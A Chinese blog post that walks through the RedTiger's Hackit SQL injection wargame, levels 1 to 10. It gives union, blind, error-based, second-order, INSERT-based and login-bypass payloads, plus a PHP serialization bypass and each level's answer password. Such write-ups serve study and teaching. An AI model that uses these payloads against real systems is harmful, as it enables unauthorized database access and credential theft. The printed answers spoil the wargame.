RedTiger level1-10做题心得与解法

最新推荐文章于 2022-08-23 21:06:49 发布
最新推荐文章于 2022-08-23 21:06:49 发布
阅读量9.3k 收藏 5
点赞数 2
分类专栏: 笔记 文章标签: mysql 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xzz2333/article/details/109624257
版权

Redtiger地址
wechall上的加分地址

文章目录

level 1

从Category注入,数字型
order by 4
union select 1,2,3,4
无法查看information.schema
猜测level1_users的列名,没有user列或者说屏蔽了,因此猜测是password的第一条
select group_concat(column_name) from information_schema.columns where table_name = 0x6C6576656C315F7573657273

select password from level1_users limit 1

payload:cat=1 union select 1,2,3,(select password) from level1_users limit 1#

The password for the next level is: passwords_will_change_over_time_let_us_do_a_shitty_rhyme

level 2

很简单的注入
Password: ’ or 1=1 #

The password for the next level is: feed_the_cat_who_eats_your_bread

level 3

错误信息不回显
尝试直接报错注入不行
extractvalue(rand(),concat(0x7e,(database()),0x7e))

报错
usr[]=

得到加密的php

构造sql语句并加密

Admin’ order by 7#
共有7列

但是没有一列显示,应该是在显示的时候只选择显示了第一行
尝试报错注入也不行,应该是通过php语句强行只显示一行
union一下自己的语句,然后通过order排序将自己的语句排到第一位显示

Admin’ union select 1,(select group_concat(password) from level3_users),3,4,5,6,7 order by 1#

The password for the next level is: put_the_kitten_on_your_head

level 4

题目很明显地提示了这是盲注,那就构造盲注语句

id=1 and if(1=1,benchmark(1000000,select 1),1)#

尴尬,不能使用benchmark,那就尝试布尔盲注

在这里插入图片描述

id=1 and if(1=1,true,false)

通过返回值判断,如果正确返回1 rows.

如果错误则返回0 rows.

首先判断长度

id=1 and if(length(select keyword from level4_secret limit 1)=20,true,false)

但是这道题目的长度好像求不出来(尴尬,后面发现原来是我上面的sql语句写错了)

正确的求长度语句应该是

id=1 and if((select length(keyword) from level4_secret limit 1) = 21,true,false)

然后开始判断字母

判断字母

id=1 and if(ascii(substr((select keyword from level4_secret limit 1),1,1))>0,true,false)

得到结果

killstickswithbr1cks!

The password for the next level is: this_hack_it’s_old

level 5

题目提示

  1. 不是盲注
  2. 密码是md5加密的
  3. 注意登录错误

首先先找一下注入点

登录名母庸置疑是admin,但是好像直接屏蔽了admin,即使是只输入了admin,也会显示错误。

因此尝试用户名不输入admin,然后添加’’,发现界面会显示错误信息,可以,成功一半了。
在这里插入图片描述

报错注入不好使,感觉得构造admin,因此题目屏蔽了substr和mid,left也屏蔽了。

尝试了

  • ad’ or ‘admin’#
  • adadminmin
  • AdMin(各类大小写)
  • concat(‘ad’,‘min’)
  • ad/**/min

应该是语句里面包含admin都会报错

用’ order by 语句或者’ select 1,2…语句都可以得到这张表只有两列

此时可以构造自己的用户名和密码绕过登录,在wechall上也有同样方法的题目,思路是这样:

因为在username这一栏是从数据库中获得两列数据,不难猜到一个是用户名,一个是密码,此时如果我们输入username=’#,那么返回的就是一个空,但是呢,如果我们在后面union一个我们虚构的用户名和密码,那么这个sql语句返回的就是我们的用户名和密码,即使数据库里没有这一条数据。代码如下:

username=’ union select “1”,md5(1)#

这样我们就虚构了一个用户名为1,密码为md5(1)的数据信息,此时在password栏写上1,就可以绕过登录了。

这个方法适用于没有回显,并且报错注入不能用,但是用户名和密码是分开验证的情况下。

The password for the next level is: the_stone_is_cold

level 6

user是注入点,是数字型注入。

user=1 order by 5#

测试得列数为5

使用union select 1,2,3,4,5#发现不回显,可能也是只显示一行,使用order by测试,猜测第一列是user值,第五列是status值,但是如果把数字列排到前面会显示无user,应该是进行了两次sql查询

思路——二次注入

php中应该是先通过user值查询,再根据查询得到的用户名或者其他信息将用户名和邮箱地址打印出来

第一个查询是数字类型,第二个查询是字符串

语句如下

select 1,2,3,4,5

select * from level6_users

联合起来就是下面这句,但是因为屏蔽了’所以用十六进制来代替

user=0 union select 1,’ union select 1,2,3,4,5 from level6_users limit 1#,3,4,5#

user=0 union select 1,0x2720756e696f6e2073656c65637420312c322c332c342c352066726f6d206c6576656c365f7573657273206c696d6974203123,3,4,5#

发现第二位是username,第4位是email

user=0 union select 1,’ union select 1,username,3,password,5 from level6_users where status=1#,3,4,5#

0x2720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d3123

最后完整语句

user=0 union select 1,0x2720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d3123,3,4,5#

The password for the next level is: shitcoins_are_hold

level 7

初步判断,从search栏输入关键字,在下面输出包含关键字的文章,sql语句用的应该是like

从报错信息可以得到有两张表

text.idtext.titletext.text
news.idnews.autor

屏蔽了order # 空格

SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE ‘%注入点%’ OR text.title LIKE ‘%注入点%’)

发现注释都被过滤了,#是直接过滤了,/**/也被过滤了,而如果输入-- 和–+都被过滤了,看了网上的一些解析,发现是用换行符的url编码来代替空格,但是我在search栏里面写了很多种办法都是数据库报错,这时我就有些疑惑了,然后去抓包,发现我在search栏里输入的空格都变成了+号,难怪sql语句错误,所以这道题要对数据包进行直接更改。知道了这点接下来就都是常规操作了,求列数,看回显,然后把所有的作者打印出来就行了。

payload:search=3333’) union select 1,2,(select group_concat(autor) from level7_news),4–%a0&dosearch=search%21

然后就是一个一个试过去就行了,也可以通过两张表联合起来再找,不过有些麻烦,不如这样方便。

The password for the next level is: or_so_i’m_told

level 8

email可注入,应该把注释过滤了

ICQ和Age都是字符型,都把’转义了,按照错误提示

这是修改数据库内容,因此应该是update语句

update 表名

set ‘’ = ‘’,’’=’’

where ‘’’

这也正好对应了报错语句

猜测sql语句为:

update level8_update

set name=’’,email=’’,icq=’’,age=’’

WHERE id = 1

因为是不可能更改密码的,所以我们要构造语句使得密码显示出来,而这道题表和列名都没有给出,因此很容易就可以想到报错注入,在这道题目中,icq和age中’都被转义了,因此可以在email中添加一个’,在age中添加一个#,使得email的值为**’’,icq=’’,age=’**,这样我们就可以在age的#前面添加报错语句了,事实上我这样确实成功了。

模板如下:

email=’

icq=

age=报错语句#

报错语句如下

  • 爆数据库—— and extractvalue(1,concat(0x7e,database(),0x7e))

    • 得到数据库名
    • 在这里插入图片描述

  • 爆表—— and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 15,1),0x7e))

    • 得到表名,因为只能显示三个,所以我一个一个试过去了,可能有直接显示的办法,但我目前还做不到,发现第十六张表是level8_users
    • 在这里插入图片描述

  • 爆列名——and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x6c6576656c385f7573657273),0x7e))

    • 因为转义了单引号,因此用十六进制表示表名
    • 在这里插入图片描述

  • 爆数据——and extractvalue(1,concat(0x7e,(select ll8.password from (select l8.password from level8_users l8) ll8 limit 1),0x7e))

    • 这里好坑爹啊,因为在mysql中,update后的FROM后面不能接该表,所以需要一个中间过程,将我们需要的数据通过中间表再select一遍,同时需要取两个别名防止重名,不过结果是好的,得出flag了

    • 在这里插入图片描述

    • p.s.我是盲猜密码是第一行的

The password for the next level is: network_pancakes_milk_and_wine

level 9

先在每一个输入处都加个单引号测试一下,发现在text内容里输入’会报错,那注入点八九不离十就是这里了。

初步判断这是insert语句,而且题目也说需要得到反馈,那就应该也是报错注入(后面发现不对)

insert语句格式如下

INSERT INTO table_name ( field1, field2,...fieldN )
                       VALUES
                       ( value1, value2,...valueN );

因此对于这道题,应该是

insert into ‘’’’’ (‘name’,‘title’,‘text’) values (‘内容’,‘内容’,‘在此注入’)

用了很多种方法发现注释全部都被过滤了,这时就很迷茫,后来看到了别人的payload才恍然大悟,既然不能使用注释,那就把name,title里的值合在一起形成一条记录,然后自己构造一条新的记录,语句结构如下

INSERT INTO table_name ( field1, field2,...fieldN )
                       VALUES
                       (value1), (value2),...(valueN);

因此payload如下:

name:123

title:123

text:1’),((select username from level9_users limit 1),(select password from level9_users limit 1),'123

然后就能得到用户名密码了。

感悟:对于sql语句得要非常熟悉啊,不过话说level 8的报错应该可以把每道题的数据都爆出来-。-

The password for the next level is: whatever_just_a_fresh_password

level 10

开始只有一个Login按钮,检查网页源码发现了一个隐藏的文本框,先修改type属性为text,发现里面有一串密码,每次都改属性挺麻烦的,于是在Burp Suite上操作。

首先先对默认的密码进行解码(Base64),得到

a:2:{s:8:“username”;s:6:“Monkey”;s:8:“password”;s:12:“0815password”;}

发现这是一个php序列化的字符串,然后因为没有这方面的知识,所以去百度了一下,知道了数据库一个有技巧的东西,当where语句后面的条件语句的莫一变量为真时,该语句会变成真但是得到的是一个空,因此可以用来绕过if验证,那么payload就很明显了

payload:a:2:{s:8:“username”;s:9:“TheMaster”;s:8:“password”;b:1;}

The password for the hall of fame is: make_the_internet_great_again

最后放上一张wechell上的截图,差一个就全部是我了哈哈,虽然没什么用,但是自己纪念一下
在这里插入图片描述

如有错误望大家指正
交流qq:1020328970

小猪猪水上漂
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入靶场 RedTiger通关教程(level1~level10)
0xuu的博客
07-07 1090
SQL注入靶场RedTiger's Hackit 通关教程;RedTiger通关教程(level1~level10)
RedTiger‘s Hackit Level 1总结
滚滚是只小狐狸
02-14 1182
RedTiger’s Hackit Level 1总结 Level 1 目: Welcome to level 1 Lets start with a simple injection. Target: Get the login for the user Hornoxe Hint: You really need one? omg -_- Tablename: level1_users Cat...
RedTiger's Hackit Level 1
GTMer的专栏
10-27 1159
测试发现cat = 1有返回,其他均报错 http://redtiger.labs.overthewire.org/level1.php?cat=1 其后接and 1 =1 和 and 1= 2 有不同反馈,存在注入 union select 1,2,3,4  发现存在4列,显示第3、4列 尝试从information_sechema读取数据,提示disabled。
RedTiger’s Hackit Level 1总结
最新发布
leo001226的博客
08-23 125
RedTiger's Hackit Level 1 总结
redtiger 注入练习 writeup
dkfagk4904的博客
07-30 343
目前进度前两,过程后续补上。 第一: http://redtiger.labs.overthewire.org/level1.php 1 union select 1,2,username,password from level1_users You can raise your wechall.net score with this flag: XXXX The passw...
Redtiger技巧(一)
Lorezon的博客
10-12 1823
(写这个博客本意就是为了自我总结,然后顺便试试新买的键盘。博主本人其实也就是个菜鸟,所以希望前辈们多多指导) 第一关: 根据提示,username=Hornoxe,给了Tablename: level1_users ok。我们先查看源码(看源码是我个人习惯,因为常常能在源码里发现意想不到的东西) 会发现一个有意思的东西:?cat=1 ok。返回答关,构造语句 http://redtiger.la...
学习网站1
08-08
"alert(1) to win"通常被用来演示最基本的XSS攻击,通过在网页中插入JavaScript代码,触发浏览器弹出对话框显示数字1。XSS训练平台如CAPTF、CTF复现CG-CTF以及CoolShell上的小游戏,都是为了帮助初学者理解和实践这...
CTF从入门到提升(二).docx
12-18
1. 编程语言基础(C、汇编、脚本语言) 2. 数学基础(算法、密码学) 3. 背景大开(天马行空的想象、推理解密) 4. 体力耐力(通宵熬夜) CTF的比赛类型: 1. Web密码学:Web安全、网络安全、内网渗透、数据库安全...
redtigerSQL注入
EmilSinclair4391的博客
08-17 485
http://blog.spoock.com/2016/07/25/redtiger-writeup/
RedTiger's Hackit wirteup
a370793934的专栏
11-28 653
sql注入挑战 level1 简单注入,payload: http://redtiger.labs.overthewire.org/level1.php?cat=0 union select 1,2,username,password from level1_users 返回 Hornoxe thatwaseasy 登录后显示 You made it! You can raise...
RedTiger 通关学习总结
hl1293348082的专栏
03-25 420
本文涉及的一些文件放在了下面: https://pan.baidu.com/s/1WY_iDeeNFFi89v7FdVxPIw 学习 SQL 注入有两套必刷,一个是 sqli-labs,这个已经有了成套的 wp 讲解,在上面的网盘里。 另一个就是这个 RedTiger 了,目非常地巧妙,每一关对应一个 SQL 知识点,一套下来,能学到很多东西。 唯一美中不足的是,因为目是在一套环境下,为了防止从第一关的注入点注出第十关的 flag,所以都限制了函数和一些关键字,导致无法使用正常的注入流程来
SQL注入大闯关笔记
Sean的博客
03-17 2648
目录前言一、SQL注入是什么?二、靶场是什么?三、挖掘漏洞1.redtiger靶场1.第一关2.第二关3.第三关总结 前言 随着国家对安全越来越重视,个人感觉每个人都需要了解一下安全方面的知识。学习安全,先要从靶场起,说干就干。 一、SQL注入是什么? 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻
redtiger sql注入
yy652的博客
11-12 217
level4 简单测试,id存在注入点,id=1 and 1=1通过,判断是布尔。 根据Query returned 0 rows. 或Query return 1 rows.进行盲注。 id=1 and 1=(select length(keyword)=21 from level4_secret) 字段长度为21。 这个地方,猜一下数,一般不会太长,也可以爆破一下(不太会写,随便看看) import requests import re url = 'http://redtiger.la.
RedTiger‘s Hackit
Alita_lxz的博客
11-02 1394
RedTiger’s Hackit http://redtiger.labs.overthewire.org/ Level 1 Simple SQL-Injection 打开对应连接,是一个登录页面,先是告诉我们登录的用户名是什么,然后给了一个提示,把表名level1_users给出来了,现在就是要找注入点在哪里了,看到Category:后的1可以点击 点击之后出来cat=1,这就很明显了 试了一大顿,发现这个1后竟然不需要闭合引号,根据order by 得出表有4列 本来想爆一下列名,可能是有参数被
mysql 登录框注入_登陆界面的SQL注入
weixin_42245967的博客
02-18 2684
首先登陆的sql通常分为两种类型1234567(1)先匹配username(注册时也类似这种方法验重)$query = mysql_query("SELECT * FROM interest WHERE uname = '{$_POST['uname']}");$key = mysql_fetch_array($query);if($key['pwd'] == $_POST['pwd']) {.....
writeup--RedTiger's Hackit
charlie_heng的专栏
12-19 4152
RedTiger’s Hackit第一关首先点进Category 1 网址后面跟了?cat=1,很明显是一个sql注入 看了下还给了表名。。Tablename: level1_users 构造了下 https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from le
RedTiger's Hackit Level 2
GTMer的专栏
10-27 741
username处注入 a' or 'a' = 'a' -- d    不行,应该是把后面frome table给注释掉的原因。 由于and的优先级高于or,因此在username后注入的or语句和password判断and在一起,不管用。 在password后注入or语句,get !
网站攻防:SQL 注入详解扫盲
网站运营
01-11 679
实习期间的主要工作还是研究 WEB 安全,编程语言是 Python,常用到正则表达式,对 HTTP 的协议也非常清晰。 刚过来的时候,研究的主要是 SQL 注入,因为之前没有搞过安全,所有费了好长一段时间学习 SQL 注入的基本知识。这篇文章并不是什么很深入的技术文章,或许应该叫它‘ SQL注入扫盲 ’。 关于 SQL Injection SQL Injection 就是通过把恶
RedTiger's Hackit(level2)
xz913400155的博客
12-11 483
第二关 简单的sql绕过 https://redtiger.labs.overthewire.org/ 进入第二关 给的目标是登入 提示是条件 然后就给了用户名及密码两个输入框 很容易就联想到输入内容就是查询语句中where的判断条件 账号密码一般都是用字符串格式 所以猜测where语句差不多是如下格式 where username=‘我们的输入’ and password=‘我们的输入’ 然...
RedTiger's Hackit Level 3
GTMer的专栏
10-29 728
usr采用了某种编码,usr[0]=? 使php报错,得到加密代码路径。 php加密代码中使用了srand定义了种子,因此其后每次rand()值都是固定的。 可能是由于php版本不同,我加解密得到的结果和网站不一样,由于rand()算法不同?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值